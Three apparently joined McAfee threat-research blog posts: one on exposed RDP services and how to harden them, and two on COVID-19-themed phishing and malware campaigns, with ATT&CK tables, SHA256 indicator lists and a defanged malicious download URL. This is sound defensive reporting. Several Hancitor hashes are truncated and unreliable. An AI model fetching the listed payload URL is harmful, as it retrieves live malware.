McAfee Advanced Threat Research and the security industry have been aware of the risk of exposed RDP for many years and will continue to raise awareness as part of our global threat monitoring.

In this blog, we will discuss the risks of exposing the RDP protocol and the associated misconfigurations.

RDP Statistics

The number of RDP ports exposed to the Internet has grown quickly, from roughly three million in January 2020 to more than four and a half million in March. A simple search on Shodan reveals the number of RDP ports exposed to the Internet by country.

 

It is interesting to note that the number of RDP systems exposed is much higher for China and the United States.

Most of the compromised systems using RDP are running Windows Server but we also notice other operating systems, such as Windows 7.

For attackers, access to a remote system can allow them to perform several criminal actions such as:

  • Spreading spam: Using a legitimate system for sending spam is very convenient. Some systems are sold especially for this purpose.
  • Spreading malware: A compromised system provides a ready-to-use machine for easily distributing malware, or even pivoting to the internal network. Many ransomware authors use this vector to target organizations around the world. Another criminal option would be to implant a cryptominer.
  • Using the compromised box as their own: Cybercriminals also use remotely compromised systems to hide their tracks by, for example, compiling their tools on the machine.
  • Abuse: The remote system can also be used to carry out additional fraud such as identity theft or the collection of personal information.

This recent increase in the number of systems using RDP over the Internet has also influenced the underground. McAfee ATR has noticed an increase in both the number of attacks against RDP ports and in the volume of RDP credentials sold on underground markets.

As observed on Shodan, the number of exposed systems is higher for China (37% of total) and the United States (37% of total), so it is interesting to note that the number of stolen RDP credentials from the US (4% of the total) for sale is comparatively much lower than other nations. We believe this may be because the actors behind the market sometimes hold back RDP credentials without publishing their whole list.

How are Attackers Breaching Remote Systems?

Weak passwords remain one of the common points of entry. Attackers can easily use brute force attacks to gain access. In the below image we see the 20 most used passwords in RDP. We built this list based on information on weak passwords shared by a friendly Law Enforcement Agency from taken down RDP shops.

The diagram below demonstrates the number of compromised systems using the top 10 passwords. What is most shocking is the large number of vulnerable RDP systems that did not even have a password.

The RDP protocol also suffers from vulnerabilities and needs patching. Last year, we explained in detail the workings of the BlueKeep vulnerability that affects reserved channel 31, which is part of the protocol functionality, to allow remote code execution.

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/

In early January, additional flaws related to Remote Desktop Gateway were also patched:

These two vulnerabilities are similar to the BlueKeep vulnerability and allow remote code execution by sending a specially crafted request. We have not yet observed this vulnerability exploited in the wild.

To secure the RDP protocol, the following checklist can be a good starting point:

  • Do not allow RDP connections over the open Internet
  • Use complex passwords as well as multi-factor authentication
  • Lock out users and block or timeout IPs that have too many failed logon attempts
  • Use an RDP gateway
  • Limit Domain Admin account access
  • Minimize the number of local admins
  • Use a firewall to restrict access
  • Enable restricted Admin mode
  • Enable Network Level Authentication (NLA)
  • Ensure that local administrator accounts are unique and restrict the users who can logon using RDP
  • Consider placement within the network
  • Consider using an account-naming convention that does not reveal organizational information

For more details about how to secure RDP access, you can refer to our previous blog (https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rdp-security-explained/)

Conclusion

As we discussed, RDP remains one of the most used vectors to breach into organizations. For attackers, this is a simple solution to quickly perform malicious activities such as malware, spam spreading or other types of crime.

There is currently a whole business around RDP on the underground market and the current situation has amplified this behavior. To stay protected, it is essential to follow best security practices, starting with the basics, such as using strong passwords and patching vulnerabilities.

McAfee ATR is actively monitoring threats and will continue to update you on this blog and its social networking channels.

The post Cybercriminals Actively Exploiting RDP to Target Remote Organizations appeared first on McAfee Blogs.

McAfee Surveys Cyber-Threats in the Age of Coronavirus

Change is a constant in technology, and the greatest changes are often driven by major events that fundamentally reshape how people work and conduct business. In the Age of Coronavirus, more than ever, technology and cybersecurity must keep pace with disruption and change, adapt to adversity, and even accelerate their development wherever possible.

The enormous increase in remote work over the last couple of months has placed new pressure on organizations to ensure that employees working from home can access corporate resources from outside corporate-controlled offices and infrastructure. Simultaneously, cybercriminals are seeking to gain from the strain this places on technologies, business procedures, and processes. A critical and effective vector for these adversaries exploiting the health and economic concerns created by the pandemic.

This week, McAfee Labs released a report entitled COVID-19: Malware Makes Hay During a Pandemic to highlight the last few months of pandemic-themed threat landscape activity. The threats typically leverage a phishing email delivery method, with Coronavirus themes and messages developed to lure employees and family members into engaging with and enabling threats to gain a foothold on their systems.

Once established, that foothold can allow cyber adversaries to download malware used to steal corporate usernames and passwords, data, monitor employee user activity, capture user keystrokes, track network traffic and browser activity, and infiltrate networks and cloud services beyond the home. They can impersonate their victim to send emails from the infected machines to propagate themselves on numerous other systems. In the case of ransomware, they could encrypt system files and refuse to decrypt them until the victim sends them a ransom payment.

Below is a summary of some of the cyber threats McAfee has observed since the COVID pandemic has emerged:

Phishing and Trojans: In January, McAfee observed the emergence of a phishing campaign using a strain of the Ursnif banking Trojan commonly used to steal usernames, passwords and user behavior information. As bait, the phishing emails used pandemic-themed messaging and a Microsoft Office document with “COVID-19” in its filename to lure users into opening the attachment and releasing the malware onto their computers.

Beginning in February, McAfee observed another campaign leveraging phishing emails referencing the terms “COVID-19” and “Coronavirus” to entice users to click on links or attachments that then downloaded the information-stealing Fareit Trojan onto their computers.

Example Fareit Emails:

 

 

Bogus SBA Loan Emails: Beginning in late March, a phishing campaign used emails claiming to originate from the U.S. Government Small Business Administration (SBA). These emails appeared to offer small businesses information and guidance on how to apply for SBA loans. In fact, they were a mechanism for infecting unsuspecting small business owners with the information-stealing Remcos Remote Access Tool (RAT).

Scam COVID-19 Tests: In March, cybercriminals distributed phishing emails appearing to originate from organizations offering COVID-19 testing. Users were prompted to open an attached document, which would then download the information stealing Trickbot malware.

Scam Antibody Research & Treatment: By late March, McAfee began to see COVID-19-themed phishing campaigns using a strain of the Emotet Trojan to infect users’ systems. One version of this email promises to provide information on Coronavirus antibody research and new treatments for the disease. Once established on the victim’s system, Emotet can do a number of things on the system but it is almost always programmed to propagate itself by sending large numbers of spam emails to other user’s systems.

Precautionary Measures: April saw the emergence of phishing email campaigns using subject lines such as “COVID-19 Urgent Precaution Measures” to distribute the NanoCore Remote Access Tool (RAT) for exfiltration of valuable information.

Fake John Hopkins Infection Map: April also saw cybercriminals use phishing emails to promote a fake website featuring a global Coronavirus infection map appearing to provide data from John Hopkins CSSE. Unfortunately, those same emails were used to infect inquisitive users with a strain of information stealing Azorult malware.

Bogus Insurance Invoices: Mid-April also saw cybercriminals use COVID-19-themed emails from a bogus insurance company to infect users’ systems with fake invoice attachments carrying the Hancitor malware.

COVID-19 Ransomware.: March saw the emergence of Ransomware-GVZ, a Coronavirus-themed ransomware campaign. Ransomware-GVZ displays a “ransom note” message demanding payment in return for decrypting their systems and the precious personal and corporate data they contain.

By mid-April, another ransomware campaign joined the fray, this time using a strain of Netwalker ransomware to infect users via a malicious file named “CORONAVIRUS_COVID-19.vbs”.

Spam & Scam: Finally, beyond malware, McAfee has detected thousands of COVID-19-themed spam emails and websites scamming victims seeking to purchase medical supplies such as testing kits, face masks, and other protective gear. Over the first 13 weeks of the pandemic, McAfee saw the number of bogus websites increase from 1,600 a few weeks ago to over 39,000.

Takeaways

Cybercriminals will always seek to create ever more sophisticated and opportunistic attacks.  Remote work paradigms create new opportunities and require new defense mechanisms and practices. This week’s report illustrates the importance of maintaining strong cybersecurity defenses regardless of whether employees are in traditional office or home-office environments. We must formulate the right combination of technology and education to make that happen.

Organizations need to defend against cyber-threats at home with data protection solutions capable of preventing intellectual property and other forms of sensitive data from being stolen. McAfee is focused on helping address these challenges with its Unified Cloud Edge and CASB solutions that are inherently focused on protecting both mobile and traditional devices from threats and data theft.  Additionally, modern endpoint and EDR capabilities are capable of detecting a wide range of threats that place the user and their organization at risk.

The future is uncertain, change and disruption are inevitable, and our adversaries are determined in their drive to exploit us at work, no matter where that may be. We must rise to the challenge of pushing technology forward, adapting, and developing stronger cyber defenses to ensure that the “future of work” is a secure one.

Please see this week’s “COVID-19: Malware Makes Hay During a Pandemic” report for our summary of COVID-19-related McAfee threat research.

The post McAfee Surveys Cyber-Threats in the Age of Coronavirus appeared first on McAfee Blogs.

COVID-19 – Malware Makes Hay During a Pandemic

Special thanks to Prajwala Rao, Oliver Devane, Shannon Cole, Ankit Goel and members of Malware Research for their contribution and monitoring of related threats

As COVID-19 continues to spread across the world, it is no surprise that malware authors are exploiting the pandemic. McAfee recently released blogs around Covid-19 related threats – Staying safe while working remotely, COVID-19 Threat Update Now Includes Blood for Sale and Transitioning to a Mass Remote Workforce. The first discusses how attackers would like to leverage this pandemic as an opportunity to attack organizations, the second gives a preview of attackers playing on the fears of the general public grappling to get a hold of a cure, help manage this illness and stay safe while the third gives some direction to organizations on how to verify their security controls. In this blog we continue to discuss COVID-19 themed attacks and how to stay vigilant.

The weeks of quarantine have forced individuals and organizations to quickly adapt to a work from home model. A lot more time is spent indoors and online and there continues to be anxiety around when normalcy will be restored. For now, we continue to deal with a barrage of news articles around the pandemic, managing supply and demand of household goods in stores and online, and a shortage of medical supplies such as preventative masks, gloves and sanitizer. These are trying times for us and a feast for fear mongering malware criminals.

Over the last few months of 2020, McAfee researchers have been hard at work during this time to keep our customers safe by more directed monitoring and adaptation of our detection stack to better manage the COVID-19 threat landscape. This is not intended to be an exhaustive report due to the scope of a continually evolving landscape for COVID-19; therefore, we cover a subset of threats directed towards malware, spam and malicious/scam URL campaigns.

This blog serves to remind customers to utilize the various levers present in our endpoint product and our expanded portfolio such as McAfee’s Unified Cloud Edge. Please read our recommendation section and view our IOC section (partial IOC list based on this article), expert rules section (covers few tactics based on this article). McAfee utilizes several internal and external sourcing techniques for malware harvesting including collaboration with other industry partners as part of the Cyber Threat Alliance.

Table of contents:

Timeline

The timeline below shows a subset of prevalent malware families observed in our spam traps with references to COVID-19/Coronavirus. The malware shown in this timeline have been chosen due to their capacity for damage (such as ransomware) or their ability to propagate (Emotet for spam, or other worm like activities).

A weekly distribution of all known COVID related IOCs per week is shown below.

 

Malware

This section covers a subset of the Malware families included in the timeline above and shows the various IOCs that referenced the virus. For a more comprehensive list of IOCs please refer to the IOC section.

Ursnif

The first threat we observed taking advantage of the pandemic was Ursnif. Ursnif is a banking Trojan aimed to steal banking credentials and has been evolving to become more powerful. Ursnif collects system activities of the victims, record keystrokes, as well as keep track of network traffic and browser activity.

We have observed Ursnif using the COVID-19 filename to entice users since January 2020.

 

On executing the VBS file it drops a dll in C:\Programdata\FxrPLxT.dll and executes the .dll with rundll32.exe. The dll is injected into iexplorer.exe and communicates with its C&C server using http get requests.

IOCs

Type IOC Comment
Sha256 e82d49c11057f5c222a440f05daf9a53e860455dc01b141e072de525c2c74fb3 Filename: Coronavirus_disease_COVID-19__194778526200471.vbs
Sha256 8bcdf1fbc8cee1058ccb5510df49b268dbfce541cfc4c83e135b41e7dd150e8d Ursnif dll

 

MITRE ATT&CK™ MATRIX:

Technique ID Tactic Technique details
T1059 Execution Command-Line Interface
T1129 Execution Execution through Module Load
T1085 Defense Evasion, Execution Rundll32
T1060 Persistence Registry Run Keys / Startup Folder
T1055 Defense Evasion, Privilege Escalation Process Injection

 

Fareit

Fareit is an information stealer that steals data from web browsers, FTP programs, email clients and over a hundred different software tools installed on the infected machine. We have observed several Fareit phishing emails with the COVID/Coronavirus name. A few of them are shown below.

Fareit Spam 1:

IOCs

Type IOC Comment
Sha256 da1443a25f433e23a43d35d50328a4f935d3cce840f1e3cca99b6bd6d49ed6a7 Dropped Binary
Sha256 9f4bb022b49bd6ba0766e9408139648d2ddfe2f0dd5ca14644e5bdb2982b5e40 Email

 

MITRE ATT&CK™ MATRIX:

Technique ID Technique Technique details
T1193 Initial Access Spear phishing Attachment
T1106 Execution Execution through API
T1130 Defense Evasion Install Root Certificate
T1081 Credential Access Credentials in Files
T101 Discovery Query Registry

 

Fareit Spam 2:

IOCs

Type IOC Comment
Sha256  2faf0ef9901b80a05ed77fc20b55e89dc0e1a23ae86dc19966881a00704e5846 Attachment
Sha256 38a511b9224705bfea131c1f77b3bb233478e2a1d9bd3bf99a7933dbe11dbe3c Email

 

MITRE ATT&CK™ MATRIX:

Technique ID Technique Technique details
T1193 Initial Access Spear phishing Attachment
T1106 Execution Execution through API
T1130 Defense Evasion Install Root Certificate
T1081 Credential Access Credentials in Files
T1012 Discovery Query Registry
T1071 C & C Standard Application Layer Protocol

 

Fareit Spam 3:

IOCs

Type IOC Comment
Sha256 11a834cda4a55c8adb663fbcdd4b1f1018715dd737d3089a731b9840b77e5e76 Dropped Binary
Sha256 45c6440bdd7b49023bb42f9661caae3b12b579dfd5ae9e64421923ef452a0faf Email
Sha256 095bfab52666648ff4d2636a3718a28eab4d99a6c178a8c7912197221dd1d195 Email

 

MITRE ATT&CK™ MATRIX:

Technique ID Technique Technique details
T1193 Initial Access Spear phishing Attachment
T1106, T1204 Execution Execution through API, User Execution
T1060 Persistence Registry Run Keys / Startup Folder
T1130 Defense Evasion Install Root Certificate
T1081 Credential Access Credentials in Files
T1012 Discovery Query Registry
T1114 Collection Email Collection

 

Fareit Spam 4:

IOCs

Type IOC Comment
Sha256 f8e041bed93783bbd5966bfba6273fe7183464035ea54fe1d59ff85a679b3e3e Dropped Binary
Sha256 9e17f5e70c30ead347b68841fa137015d713269add98f0257fb30cc6afdea4fe Attachment
Sha256 ada05f3f0a00dd2acac91e24eb46a1e719fb08838145d9ae7209b5b7bba52c67 Email

 

MITRE ATT&CK™ MATRIX:

Technique ID Technique Technique details
T1193 Initial Access Spear phishing Attachment
T1204 Execution User Execution
T1071 Command and Control Standard Application layer Protocol

 

COVID-19 Ransomware

It was no surprise that a new Ransomware family appeared on the scene. Once executed, Ransomware-GVZ will delete shadow copies with vssadmin and then proceed to encrypt all non-pe file types.  Once a whole folder has been encrypted the ransom note file below is created.

Ransomware-GVZ will also create a lock screen component so that when the machine is rebooted the following message is displayed.

 

IOCs

Type IOC Type
Sha256 3299f07bc0711b3587fe8a1c6bf3ee6bcbc14cb775f64b28a61d72ebcb8968d3 Binary

 

MITRE ATT&CK™ MATRIX:

Technique ID Tactic Technique details
T1486 Impact Data Encrypted for Impact
T1083 Discovery File and Directory Discovery
T1490 Impact Inhibit System Recovery

 

Emotet

Emotet is another prevalent threat distributed via phishing emails. We observed the following email being distributed which translated to English is:

Subject: 

Break !!! COVID-19 solution announced by WHO at the end How a total control method is discovered

Email Body:  

As published in the newsletter of the World Health Organization 3/17/2020 7:40:21 a.m. A new collaborative study identified and studied antibodies to the COVID-19 virus which could be used to design effective universal therapies against many different species of COVID-19 viruses. The results have recently been published in Nature Microbiology.

These are based on natural activities and how heat helped inhibit the virus from growing.

The COVID-19 virus causes a serious disease with high mortality badgers in humans. Several strategies have been developed to treat COVID-19 virus infection, including ZMapp, which has proven effective in non-human primates and has been used below compassionate treatment protocols in humans …

 

Please download the full text in the attached document …

Also share with all contacts to ensure quick epidermal control.

The email contains a zipped Emotet executable which once executed will use the process hollowing technique to inject into regasm.exe. It will then contact its C&C server and being to send spam email out.

IOCs

Type IOC Comment
Sha256 ca70837758e2d70a91fae20396dfd80f93597d4e606758a02642ac784324eee6 Attachment
Sha256 702feb680c17b00111c037191f51b9dad1b55db006d9337e883ca48a839e8775 Email

 

MITRE ATT&CK™ MATRIX:

Technique ID Tactic Technique details
T1121 Defense Evasion, Execution Regsvcs/Regasm
T1093 Defense Evasion Process Hollowing

Azorult

Azorult is a malware that steals data from victim’s machine which includes username, passwords, cryptocurrencies, browsing history and cookies. It also can download additional malware onto the victim’s machine. What sets Azorult apart from the other Malware described in this report, is that the creators of Azorult created a fake Coronavirus infection map website (corona-virus-map[.]com). The fake website appears as below:

IOCs

Type IOC Comment
Sha256 c40a712cf1eec59efac42daada5d79c7c3a1e8ed5fbb9315bfb26b58c79bb7a2 Jar file from domain
URL H**p://corona-virus-map.net/map.jar
Sha256 63fcf6b19ac3a6a232075f65b4b58d69cfd4e7f396f573d4da46aaf210f82564 Dropped Binary

 

MITRE ATT&CK™ MATRIX:

Technique ID Technique Technique details
T1059 Execution Command-Line Interface
T1012 Discovery Query Registry

 

NetWalker

Another Ransomware which has leveraged COVID-19 is Netwalker. The Ransomware used the filename “CORONAVIRUS_COVID-19.vbs” to trick users into executing it. The VBS file contained the embedded Ransomware payload.

On execution of vbscript, the Ransomware is dropped in “C:\Users\<UserName>\AppData\Local\Temp\qeSw.exe” and executes it.

It Deletes the shadow copies from the machine with vssadmin.exe to make file recovery more difficult.

Below shows the Obfuscated vbscript

The ransomware iterates through the folders of the infected machine and encrypts the files. Once encrypted the file extension is changed to <filename>.1fd385. A ransom note is also dropped in each folder where files were encrypted. This note is shown below.

IOCs

Type IOC Comment
Sha256 9f9027b5db5c408ee43ef2a7c7dd1aecbdb244ef6b16d9aafb599e8c40368967 CORONAVIRUS_COVID-19.vbs
Sha256 8639825230d5504fd8126ed55b2d7aeb72944ffe17e762801aab8d4f8f880160 Dropped Binary

 

MITRE ATT&CK™ MATRIX:

Technique ID Tactic Technique details
T1204 Execution User Execution
T1064 Execution Scripting
T1106 Execution Execution through API
T1490 Impact Inhibit System Recovery
T1486 Impact Data Encrypted for Impact

 

 

Nanocore RAT

NanoCore is a Remote Access Trojan (RAT) and its highly customizable plugins allows attackers to tailor its functionality to their needs. This RAT is also found to be using COVID-19 to distribute itself by using email subjects such as “Covid-19 Urgent Precaution Measures”.

IOCs

Type IOC Comment
Sha256 ca93f60e6d39a91381b26c1dd4d81b7e352aa3712a965a15f0d5eddb565a4730 Dropped Binary
Sha256 89b2324756b04df27036c59d7aaaeef384c5bfc98ec7141ce01a1309129cdf9f Iso Attachment
Sha256 4b523168b86eafe41acf65834c1287677e15fd04f77fea3d0b662183ecee8fd0 Email

 

MITRE ATT&CK™ MATRIX:

Technique ID Technique Technique details
T1193 Initial Access Spear phishing Attachment
T1053 Execution Scheduled Task
T1060 Persistence Registry Run Keys / Startup Folder
T1143 Defense Evasion Hidden Window
T1036 Defense Evasion Masquerading
T1497 Defense Evasion Virtualization/Sandbox Evasion
T1012 Discovery Query Registry
T1124 Discovery System Time Discovery
T1065 Command and Control Uncommonly Used Port

 

 

Hancitor

Hancitor trojan has also uses COVID–19 themes to spread itself by posing as an email from insurance company. The email contains a link to download a fake invoice which downloads a VBS file.

On executing the VBS, the Hancitor dll temp_adobe_123452643.txt is created in the %AppData/Local/Temp folder. The DLL is executed using the Regsvr32.exe and then begins to communicate with its C&C.

 

IOCs

Type IOC Comment
Sha256 2f87dd075fc12c2b6b15a1eb5ca209ba056bb6aa2feaf3518163192a17a7a3 Downloaded Binary
Sha256 0caef2718bc7130314b7f08559beba53ccf00e5ee5aba49523fb83e1d6a2a347 Downloaded Binary
Sha256 375d196227d62a95f82cf9c20657449ebea1b512d4cb19cdfe9eb8f102dd9fa Downloaded Binary
Sha256 0b8800734669aa7dbc6e67f93e268d827b5e67d4f30e33734169ddc93a026 Downloaded Binary
Sha256 9c40426f157a4b684047a428428f882618d07dc5154cf1bf89da5875a00d69c Email

 

MITRE ATT&CK™ MATRIX:

Technique ID Technique Technique details
T1192 Initial Access Spear phishing Link
T1064 Execution Scripting
T1117 Execution Regsvr32
T1071 Command and Contro Standard Application layer

Protocol

 

Heat Map

This detection heat map shows a snapshot of the various countries where McAfee has observed a detection for known IOC’s since mid-January. We have observed detections in almost all the countries which have been impacted by the COVID-19 pandemic.

Spam

There have been thousands of COVID-19-themed spam emails sent daily. They range from medical supply scams to extortion. Below are a few examples of the ones we have observed.

 

URL

We have observed the number of Malicious URLs with references to COVID-19 and Coronavirus spike in the last few weeks. The numbers increased from 1,600 a few weeks ago to over 39,000 in week 13. This highlights the importance of being vigilant when clicking on links and accessing websites as the number of malicious sites is increasing exponentially.

 

Here are examples of malicious websites we have. False advertising is a common practice during such pandemics. At the time of this writing, there aren’t any quick testing kits available. Also testing is initiated by health care providers and therefore it is important to educate yourself and others around you to not buy into scams.

The following is an example of a fake website which offers Coronavirus testing services.

Face masks have been in high demand and in many places have run out. Additionally, there has been a shortage of masks even with the health care community. At times of panic and shortage, it is common for spammers to send out links to fake sites claiming to have medical supplies equipment. Here is a screenshot of fake online shop selling face masks.

GTI provides categorization and classification of links serving malware, phishing, scamming etc. McAfee products leverage GTI for URL protection. Also, McAfee’s Unified Cloud Edge provides secure access and expands your capabilities for URL protection.

Read about an example of one McAfee researcher is giving back by 3D printing masks and shields.

IOCs

Below is a partial list of IOCs we have observed in the field which have taken advantage of the Covid-19 outbreak. The IOCs in this section are a subset of those detected by McAfee’s solutions. We have broader coverage provided by our GTI Cloud, gateway, ATP and other products in our portfolio.

Type Value
SHA256 2ec4d4c384fe93bbe24f9a6e2451ba7f9c179ff8d18494c35ed1e92fe129e7fa
SHA256 7e52f7a7645ea5495196d482f7630e5b3cd277576d0faf1447d130224f937b05
SHA256 69724a9bd8033bd16647bc9aea41d5fe9fb7f7a83c5d6fbfb439d21b7b9f53f6
SHA256 f92fecc6e4656652d66d1e63f29de8bfc09ea6537cf2c4dd01579dc909ba0113
SHA256 a5ab358d5ab14b81df2d37aedf52716b5020ab45da472dedc8b8330d129d70bf
SHA256 8028f988c145b98ddd4663d3b5ec00435327026a8533924f7b8320c32737acf4
SHA256 aab93bf5bb0e89a96f93a5340808a7fa2cebf4756bd45d4ff5d1e6c8bdccf75d
SHA256 2e93fe77fafd705e6ca2f61f24e24a224af2490e0a3640ed53a17ea4bf993ec8
SHA256 f850f746f1a5f52d3de1cbbc510b578899fc8f9db17df7b30e1f9967beb0cf71
SHA256 dd78b0ecc659c4a8baf4ea81e676b1175f609f8a7bba7b2d09b69d1843c182cb
SHA256 e352c07b12ef694b97a4a8dbef754fc38e9a528d581b9c37eabe43f384a8a519
SHA256 e82d49c11057f5c222a440f05daf9a53e860455dc01b141e072de525c2c74fb3
SHA256 8bcdf1fbc8cee1058ccb5510df49b268dbfce541cfc4c83e135b41e7dd150e8d
SHA256 95489af84596a21b6fcca078ed10746a32e974a84d0daed28cc56e77c38cc5a8
SHA256 002c9e0578a8b76f626e59b755a8aac18b5d048f1cc76e2c12f68bc3dd18b124
SHA256 da1443a25f433e23a43d35d50328a4f935d3cce840f1e3cca99b6bd6d49ed6a7
SHA256 08c1aca51ae6917ed138ec70cc7768b935d13fbd743e85191877006626fdc530
SHA256 a9864b548d71c95333efd81d9fb000347bc715c7430e24f37f5bbbde4f2adf39
SHA256 8deba9fb53096d6ea5e2090b662244293829096eee03d06108deb15e496a807e
SHA256 c3477ca9a51e9eb1a93188fe2bd412830163f44b0954573d225736c530dd5fd2
SHA256 3e6166a6961bc7c23d316ea9bca87d8287a4044865c3e73064054e805ef5ca1a
SHA256 11a834cda4a55c8adb663fbcdd4b1f1018715dd737d3089a731b9840b77e5e76
SHA256 bc03c23a46a545addd1831e133b74bd2e62eb920041f18a23ec9719ea052e642
SHA256 8075381d210f7e79ee387927b7d6d690521c01ba6d835d07c4e8f023b3c164ce
SHA256 75d7d989deea561443c1c204ad22537d0c131f57820594ab5f07baba16dbc58b
SHA256 0cc54663439a55191b77e0735b7460a7435dc01542e910d75eae20ce7bb513e5
SHA256 c40a712cf1eec59efac42daada5d79c7c3a1e8ed5fbb9315bfb26b58c79bb7a2
SHA256 63fcf6b19ac3a6a232075f65b4b58d69cfd4e7f396f573d4da46aaf210f82564
SHA256 ca93f60e6d39a91381b26c1dd4d81b7e352aa3712a965a15f0d5eddb565a4730
SHA256 9f9027b5db5c408ee43ef2a7c7dd1aecbdb244ef6b16d9aafb599e8c40368967
SHA256 8639825230d5504fd8126ed55b2d7aeb72944ffe17e762801aab8d4f8f880160
SHA256 0caef2718bc7130314b7f08559beba53ccf00e5ee5aba49523fb83e1d6a2a347
SHA256 375d196227d62a95f82cf9c20657449ebea1b512d4cb19cdfe9eb8f102dd9fae
SHA256 0b8800734669aa7dbc6e67f93e268d827b5e67d4f30e33734169ddc93a026d2e
SHA256 12f87dd075fc12c2b6b15a1eb5ca209ba056bb6aa2feaf3518163192a17a7a3b
SHA256 f8e041bed93783bbd5966bfba6273fe7183464035ea54fe1d59ff85a679b3e3e
SHA256 ca93f60e6d39a91381b26c1dd4d81b7e352aa3712a965a15f0d5eddb565a4730
SHA256 da1443a25f433e23a43d35d50328a4f935d3cce840f1e3cca99b6bd6d49ed6a7
SHA256 3386dc7dc67edd5e84244376b6067e3767e914a1cc1fc7fd790a6aa68750a824
SHA256 3fc33b537fb38e1f586ddb3ebbbe152458dcde336c2f26da81d756e290b5ef00
SHA256 7cbcad4d6e9ad8438e5febd3830bff9aef4729b98d23935ad7f9e6d290272732
SHA256 0a84308348fee6bbfe64a9ef23bb9c32cb319bcdf5cf78ddfda4a83dadea4b8e
SHA256 ba4297978b6a6b5fe2b66c32ead47bbd1f2e2f549beed5cd727eb9ae3fed6b6a
SHA256 c9d3c250ab6d8535b7a4114a1e9545f0b9bc24e4e277640c59b7555f38727885
SHA256 37354a04f6d423809602e198e590469173cc8e930cc7fdd4da2c2072977251e9
SHA256 3a7a8518b41dd6c05289a08974c95a0038be4e5d1b0588edfd0589fcf22b0c8f
SHA256 ea3a0a223474592635d1fb7a0731dd28a96381ad2562e3e064f70e2d4830c39d
SHA256 140da6b610a45f84c6438207ab11942d79eb37831551810f87baae80cfff4593
SHA256 2c9c1e04d806ad8890dd6bf4477efb4ea6c78b8185a9996876bcaea568a04e70
SHA256 8a724fc60bde738694779751d6c63a7ed1caa03518b8f26b9acb36d5c1b29930
SHA256 d765980228492758a11e534e45924311aef681cb5859f701cd457b6b871c2d06
SHA256 d8183919d675978d58cd1f134768f88adeea9ce53b167c917e54fff855c6d9f9
SHA256 ac416780fa4aa340fff2787e630351c5813faceb823424817eb10e82254b785d
SHA256 3cd099efe4cb426fdc6276380c224b5478d0841c5c44d2c0a088d039d529d258
SHA256 c135f36d3346699e6d2bf9f5f5f638fd9475c0b12144a15a0652b8f1ebb25c12
SHA256 49cfa1b3cbe2bf97079c0dd0a9f604e3f2e7d9fbb6d41128a9889e068aa884f6
SHA256 5e20a0ab563950eab76c023101b1dd374becac2a5149a74320b23b59a7f16256
SHA256 7a9f249978c959e1f11f2992a8ce4a70ba333c8dbdc2638c780bbbe62de4808e
SHA256 c6dc408d60c2354a13e835bf826300a6d5258b72b8826e8c46d946cbc1f0b455
SHA256 b04584ee8b3ba565541cb0f4d8787ed6e8942b6bdec5b1acdc03488b93aeb3cb
SHA256 b283e4f841e328f0cc12ebdf76aafb819ebadba7df863681994b69697731cf96
SHA256 adde95e8813ca27d88923bd091ca2166553a7b904173ef7a2c04bb3ddf8b14a9
SHA256 bf178911f2c063c9592020652dc22076d02ca87d14a7ed7862074d334470ae32
SHA256 3981d933de93f55641fdf8cfe980e40a0bf52ce8b022735e8ebc4f08cbb19104
SHA256 aa6ceb17ced471e1695c99c0718bc24c710311f0daa256cb0783d82218d772c9
SHA256 f7209d1099c75acccbef29450271d821fd78ad52176f07aa8a93a9e61e9eaa7f
SHA256 eab14b1bfa737644f14f7bb7ace007d418230285364e168e35bd718a6517b316
SHA256 b34f4ec4ae8d66b030f547efe3acc2a71c9ab564f78aac68719ec91dab613bb3
SHA256 006dc4ebf2c47becdc58491162728990147717a0d9dd76fefa9b7eb83937c60b
SHA256 e17dca7c2c05139fc81302e76e0e9aaa29368b60cb147208cbcb5c8df113f6f6
SHA256 2e47f37bef4dea338e366ce30fe54888e5aaa2d47a5c0db4a3c3e9e5c25f8ace
SHA256 21182b7834a7e13033be7b370a68b3d3639f4cae12fe80e2a908404cbd4cd324
SHA256 46f81af256c630969f55554ea832037bc64df4374ec0f06ac83a1c4b89869314
SHA256 89a0147dec8d6838f14815b577ae41dbcf54953c66e7f5f999ab91fea6ec08fa
SHA256 2f3ee4688a31c8d249b8426f46e392d9c55b85bfad9fb31fb362eb32d38bd9b3
SHA256 f2a2bea86ce1a4803345b4aa46824c25d383a0b40b10bb69e528c72305552a2a
SHA256 698eb726345c71eca7b4a531bfa76ab6e86ef100f943a727fb5866a84ec79289
SHA256 92af9c8c539ff9f99f79cce8453b1c483d117c095e2e0ffe384d96e35f72dc8b
SHA256 7cf8f24d7e8b1e2f63bfa7a18cd420a03fff44126e80aed8cb90fba3c4e986ac
SHA256 1e4b01e3e146ff01a3782b01680a5165432af556331d599ec6ad35b4983b216f
SHA256 cba1c3070f76e1a2705afee16bd987b6a8ffa45900cab8cf3b307f60a7b89ac9
SHA256 e32cca6446f2ddd8430400b16fc171ab3163cf8222669d7d9144e9c85904d5f5
SHA256 8c0a8d6876a6c7fe44962883561d9f48615ee67f4544872ec98f47edcf516509
SHA256 a080d763c60efd4ef2781ad3090c997d1092ac726707366d92d647f26ee2965f
SHA256 9d58ca5383fef5dc837ca9d4251d247bed4ead4a6b90a9aae30568be80e20543
SHA256 345d8b4c0479d97440926471c2a8bed43162a3d75be12422c1c410f5ec90acd9
SHA256 39c17475bdb019010453085830e7f8aa1ef41ca182982491306fcf75166b8e08
SHA256 bdcef0f16c70086414ff95b69fdbbe7eb0c9814308d3d60143b6c04dfc077257
SHA256 7a97fc7bdd0ad4ef4453c2e52dd8f44dee9b4e91ff3b5518e311ef1ebac3b667
SHA256 2437ef90b60cf3d6bd0c3eebf3f41ed1e403bc31b024b52b0f41ec648d80a583
SHA256 a537c75de9a95be0c071fd6437cbaf3696752f02c3cd5afa1c9cc47c4c755f75
SHA256 9367f3ea7460ae40ca69d41398327f97136a93656ef5fad1285a0b82f81522a4
SHA256 78cf7ea3c1da98941e164f4ac3f75b57e9bce11467bc5a6c6877846f1adcf150
SHA256 e55efa92d87484cf6b251f2302a0c0c7650acd7ea658bf9997bf761b64fe472a
SHA256 51f0e9b151bde97ebeb813d6eed8a11f02551a6530049f53dc29fc1a20b6699d
SHA256 e382ee1ce9d99f4e8e18833bac121c14ee2e5dc29a8b5382ca5b4eda9db7f1aa
SHA256 e250d977e47e7809086dd35a2767f9ef557591dd00e9ce96ef4071e4f0d8c670
SHA256 50a3bea4b9686bcf5cac144d4fc18aa178f66c8368205f9065cd1d9a2c41f026
